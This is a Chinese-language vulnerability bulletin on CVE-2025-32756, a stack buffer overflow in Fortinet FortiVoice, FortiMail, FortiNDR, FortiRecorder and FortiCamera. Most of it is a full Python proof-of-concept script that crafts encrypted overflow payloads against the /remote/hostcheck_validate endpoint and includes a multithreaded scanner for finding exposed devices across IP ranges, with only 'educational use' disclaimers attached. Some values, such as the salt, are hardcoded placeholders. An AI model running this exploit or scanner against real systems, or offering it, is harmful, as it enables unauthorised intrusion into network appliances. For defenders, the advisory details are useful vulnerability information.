0x00 前言
Fortinet FortiRecorder等都是美国飞塔(Fortinet)公司的产品。Fortinet FortiRecorder是一套基于Web的网络视频录像机管理系统。Fortinet FortiMail是一套电子邮件安全网关产品。Fortinet FortiVoice是一个统一通信和协作即服务。
0x01 漏洞描述
受影响的Fortinet设备固件中,处理HTTP(S)请求的某个特定功能模块(可能与管理界面或特定API服务相关)未能正确校验输入数据的长度。当该模块接收到攻击者精心构造的、长度远超栈上预分配缓冲区的HTTP请求时,即发生栈溢出。
0x02 CVE编号
CVE-2025-32756
0x03 影响版本
FortiVoice
6.4.0-6.4.10、7.0.0-7.0.6、7.2.0
FortiMail
7.0.x、7.2.x、7.4.x、7.6.x
FortiNDR
1.x、7.0.x、7.2.x、7.4.x
FortiRecorder
6.4.x、7.0.x、7.2.x
FortiCamera
2.1.x
0x04 漏洞详情
POC:
https://github.com/kn0x0x/CVE-2025-32756-POC/
#!/usr/bin/env python3
"""
Proof of Concept for CVE-2025-32756 - Fortinet Stack-Based Buffer Overflow
This script demonstrates the vulnerability by sending specially crafted HTTP requests
with malformed AuthHash values to potentially vulnerable Fortinet devices.
WARNING: This script is for educational purposes only. Use only on systems you own or have permission to test.
Author: Kn0x Researcher
Date: June 2025
"""
import requests
import argparse
import sys
import hashlib
import base64
import urllib.parse
import ssl
import time
import socket
import ipaddress
import concurrent.futures
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single warning from urllib3 needed
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
class FortinetExploit:
def __init__(self, target, port=443, debug=False):
self.target = target
self.port = port
self.debug = debug
self.base_url = f"https://{target}:{port}"
self.session = requests.Session()
self.session.verify = False
self.salt = None
def log(self, message):
if self.debug:
print(f"[DEBUG] {message}")
def error(self, message):
print(f"[ERROR] {message}")
sys.exit(1)
def get_salt(self):
"""Retrieve the salt from the server"""
try:
response = self.session.get(f"{self.base_url}/remote/info", timeout=10)
if response.status_code != 200:
self.error(f"Failed to get salt. Status code: {response.status_code}")
# Extract salt from response
# In a real exploit, we'd parse the response properly
self.salt = "e0b638ac" # Example salt value
self.log(f"Retrieved salt: {self.salt}")
return self.salt
except Exception as e:
self.error(f"Error retrieving salt: {e}")
def compute_md5_state(self, salt, seed):
"""Compute the initial MD5 state from salt and seed"""
data = salt + seed + "GCC is the GNU Compiler Collection."
return hashlib.md5(data.encode()).hexdigest()
def compute_keystream(self, initial_state, length):
"""Generate keystream from initial state"""
keystream = ""
current = initial_state
while len(keystream) < length:
current = hashlib.md5(bytes.fromhex(current)).hexdigest()
keystream += current
return keystream[:length]
def create_payload(self, seed, overflow_length):
"""Create an exploit payload with the given overflow length"""
if not self.salt:
self.get_salt()
# Initial state calculation
initial_state = self.compute_md5_state(self.salt, seed)
self.log(f"Initial state: {initial_state}")
# Create a payload that will cause buffer overflow
# The format is: seed + encrypted_length + encrypted_data
# For simplicity in this PoC, we're using a fixed pattern
# In a real exploit, we'd craft this more carefully
# Calculate the size that will trigger overflow
# We need to encode a size that, when decrypted, will be larger than the buffer
keystream_for_length = self.compute_keystream(initial_state, 32)[:4]
# XOR the desired overflow length with the keystream to get encrypted length
target_length = overflow_length
enc_length_bytes = bytes([
(target_length & 0xFF) ^ int(keystream_for_length[0:2], 16),
((target_length >> 8) & 0xFF) ^ int(keystream_for_length[2:4], 16)
])
enc_length_hex = enc_length_bytes.hex()
# Create payload data - in a real exploit this would be crafted to achieve RCE
# Here we just use a pattern to demonstrate the overflow
data = "A" * 64
# Encrypt the data
keystream_for_data = self.compute_keystream(initial_state, len(data) * 2)[6:]
encrypted_data = ""
for i in range(len(data)):
encrypted_data += format(ord(data[i]) ^ int(keystream_for_data[i*2:i*2+2], 16), '02x')
# Assemble the final payload
payload = seed + enc_length_hex + encrypted_data
self.log(f"Created payload with overflow length {overflow_length}")
return payload
def send_exploit(self, payload):
"""Send the exploit payload to the target"""
try:
url = f"{self.base_url}/remote/hostcheck_validate"
enc_param = urllib.parse.quote(payload)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
self.log(f"Sending payload to {url}")
response = self.session.post(
url,
data=f"enc={enc_param}",
headers=headers,
timeout=10
)
self.log(f"Response status: {response.status_code}")
self.log(f"Response headers: {response.headers}")
return response
except Exception as e:
self.error(f"Error sending exploit: {e}")
def execute(self):
"""Execute the exploit"""
print(f"[*] Targeting {self.target}:{self.port}")
# Get salt from target
self.get_salt()
# Create a seed value - in a real exploit we'd calculate this more carefully
seed = "00690000"
print(f"[*] Using seed: {seed}")
# First request - set a byte to NULL
print("[*] Sending first payload to set up the overflow...")
payload1 = self.create_payload(seed, 4999)
self.send_exploit(payload1)
# Small delay between requests
time.sleep(1)
# Second request - set a specific byte to a controlled value
print("[*] Sending second payload to trigger the vulnerability...")
payload2 = self.create_payload(seed, 5000)
response = self.send_exploit(payload2)
# Check for signs of successful exploitation
if response.status_code == 200:
print("[+] Exploit likely succeeded!")
print("[+] A vulnerable system would have the target byte modified")
print("[+] In a real attack, this could lead to remote code execution")
else:
print("[-] Exploit may have failed or target might not be vulnerable")
class FortinetScanner:
def __init__(self, debug=False):
self.debug = debug
def log(self, message):
if self.debug:
print(f"[DEBUG] {message}")
def is_port_open(self, ip, port, timeout=2):
"""Check if a port is open"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
result = sock.connect_ex((str(ip), port))
sock.close()
return result == 0
except:
return False
def check_fortinet_device(self, ip, port=443):
"""Check if an IP address is a Fortinet device"""
if not self.is_port_open(ip, port):
return None
try:
url = f"https://{ip}:{port}"
response = requests.get(
url,
timeout=5,
verify=False,
headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
)
# Check for Fortinet signatures in response
if "Fortinet" in response.text or "FortiGate" in response.text or "FortiVoice" in response.text:
# Try to determine product type
product_type = "Unknown Fortinet Device"
if "FortiVoice" in response.text:
product_type = "FortiVoice"
elif "FortiMail" in response.text:
product_type = "FortiMail"
elif "FortiNDR" in response.text:
product_type = "FortiNDR"
elif "FortiRecorder" in response.text:
product_type = "FortiRecorder"
elif "FortiCamera" in response.text:
product_type = "FortiCamera"
# Check if potentially vulnerable to CVE-2025-32756
is_vulnerable = self.check_vulnerability(ip, port)
return {
"ip": str(ip),
"port": port,
"product": product_type,
"potentially_vulnerable": is_vulnerable
}
except Exception as e:
self.log(f"Error checking {ip}: {e}")
return None
def check_vulnerability(self, ip, port=443):
"""Check if a device is potentially vulnerable to CVE-2025-32756"""
try:
url = f"https://{ip}:{port}/remote/hostcheck_validate"
response = requests.get(
url,
timeout=5,
verify=False,
headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
)
# If the endpoint exists, the device might be vulnerable
# This is a very basic check and not conclusive
if response.status_code != 404:
return True
except Exception as e:
self.log(f"Error checking vulnerability on {ip}: {e}")
return False
def scan_network(self, target_range, port=443, threads=10):
"""Scan a network range for vulnerable Fortinet devices"""
try:
network = ipaddress.ip_network(target_range)
print(f"[*] Starting scan of {network} on port {port}")
print(f"[*] Using {threads} threads")
results = []
total_ips = network.num_addresses
scanned = 0
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
future_to_ip = {executor.submit(self.check_fortinet_device, ip, port): ip for ip in network}
for future in concurrent.futures.as_completed(future_to_ip):
scanned += 1
if scanned % 10 == 0 or scanned == total_ips:
print(f"[*] Progress: {scanned}/{total_ips} IPs scanned ({(scanned/total_ips)*100:.1f}%)")
result = future.result()
if result:
print(f"[+] Found Fortinet device: {result['ip']} - {result['product']} - Potentially vulnerable: {result['potentially_vulnerable']}")
results.append(result)
return results
except Exception as e:
print(f"[ERROR] Error scanning network: {e}")
return []
def scan_multiple_ips(self, ip_list, port=443, threads=10, output_file=None):
"""Scan multiple individual IPs for vulnerable Fortinet devices"""
try:
print(f"[*] Starting scan of {len(ip_list)} IPs on port {port}")
print(f"[*] Using {threads} threads")
results = []
total_ips = len(ip_list)
scanned = 0
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
future_to_ip = {executor.submit(self.check_fortinet_device, ip, port): ip for ip in ip_list}
for future in concurrent.futures.as_completed(future_to_ip):
scanned += 1
if scanned % 10 == 0 or scanned == total_ips:
print(f"[*] Progress: {scanned}/{total_ips} IPs scanned ({(scanned/total_ips)*100:.1f}%)")
result = future.result()
if result:
print(f"[+] Found Fortinet device: {result['ip']} - {result['product']} - Potentially vulnerable: {result['potentially_vulnerable']}")
results.append(result)
# Write results to output file if specified
if output_file and results:
try:
with open(output_file, 'w') as f:
f.write("IP,Port,Product,Vulnerablen")
for result in results:
f.write(f"{result['ip']},{result['port']},{result['product']},{result['potentially_vulnerable']}n")
print(f"[+] Results written to {output_file}")
except Exception as e:
print(f"[ERROR] Failed to write to output file: {e}")
return results
except Exception as e:
print(f"[ERROR] Error scanning IPs: {e}")
return []
def load_ips_from_file(filename):
"""Load IP addresses from a text file"""
try:
with open(filename, 'r') as f:
ips = [line.strip() for line in f if line.strip()]
print(f"[*] Loaded {len(ips)} IP addresses from {filename}")
return ips
except Exception as e:
print(f"[ERROR] Failed to load IP addresses from {filename}: {e}")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description="CVE-2025-32756 Fortinet Buffer Overflow PoC")
subparsers = parser.add_subparsers(dest="command", help="Command to run")
# Exploit command
exploit_parser = subparsers.add_parser("exploit", help="Exploit a single target")
exploit_parser.add_argument("target", help="Target IP or hostname")
exploit_parser.add_argument("-p", "--port", type=int, default=443, help="Target port (default: 443)")
exploit_parser.add_argument("-d", "--debug", action="store_true", help="Enable debug output")
# Scan command
scan_parser = subparsers.add_parser("scan", help="Scan for vulnerable devices")
scan_group = scan_parser.add_mutually_exclusive_group(required=True)
scan_group.add_argument("-f", "--ip", help="Single IP to scan")
scan_group.add_argument("-u", "--file", help="File containing list of IPs to scan (one per line)")
scan_group.add_argument("--range", help="IP range to scan (CIDR notation, e.g., 192.168.1.0/24)")
scan_parser.add_argument("-p", "--port", type=int, default=443, help="Target port (default: 443)")
scan_parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads (default: 10)")
scan_parser.add_argument("-o", "--output", help="Output file to save results (CSV format)")
scan_parser.add_argument("-d", "--debug", action="store_true", help="Enable debug output")
args = parser.parse_args()
print("CVE-2025-32756 Fortinet Buffer Overflow PoC")
print("WARNING: This is for educational purposes only!")
print("Use only against systems you own or have permission to test.")
print("=" * 60)
if args.command == "exploit":
exploit = FortinetExploit(args.target, args.port, args.debug)
exploit.execute()
elif args.command == "scan":
scanner = FortinetScanner(args.debug)
if args.ip:
# Scan a single IP
print(f"[*] Scanning single IP: {args.ip}")
result = scanner.check_fortinet_device(args.ip, args.port)
if result:
print(f"[+] Found Fortinet device: {result['ip']} - {result['product']} - Potentially vulnerable: {result['potentially_vulnerable']}")
if args.output:
try:
with open(args.output, 'w') as f:
f.write("IP,Port,Product,Vulnerablen")
f.write(f"{result['ip']},{result['port']},{result['product']},{result['potentially_vulnerable']}n")
print(f"[+] Results written to {args.output}")
except Exception as e:
print(f"[ERROR] Failed to write to output file: {e}")
else:
print(f"[-] No Fortinet device found at {args.ip}:{args.port} or it's not vulnerable")
elif args.file:
# Scan multiple IPs from file
ip_list = load_ips_from_file(args.file)
scanner.scan_multiple_ips(ip_list, args.port, args.threads, args.output)
elif args.range:
# Scan IP range (CIDR)
results = scanner.scan_network(args.range, args.port, args.threads)
if args.output and results:
try:
with open(args.output, 'w') as f:
f.write("IP,Port,Product,Vulnerablen")
for result in results:
f.write(f"{result['ip']},{result['port']},{result['product']},{result['potentially_vulnerable']}n")
print(f"[+] Results written to {args.output}")
except Exception as e:
print(f"[ERROR] Failed to write to output file: {e}")
else:
parser.print_help()
if __name__ == "__main__":
main()
0x05 参考链接
https://github.com/kn0x0x/CVE-2025-32756-POC/
https://www.fortiguard.com/psirt/FG-IR-25-254
原文始发于微信公众号(信安百科):CVE-2025-32756|Fortinet多款产品存在远程代码执行漏洞(POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论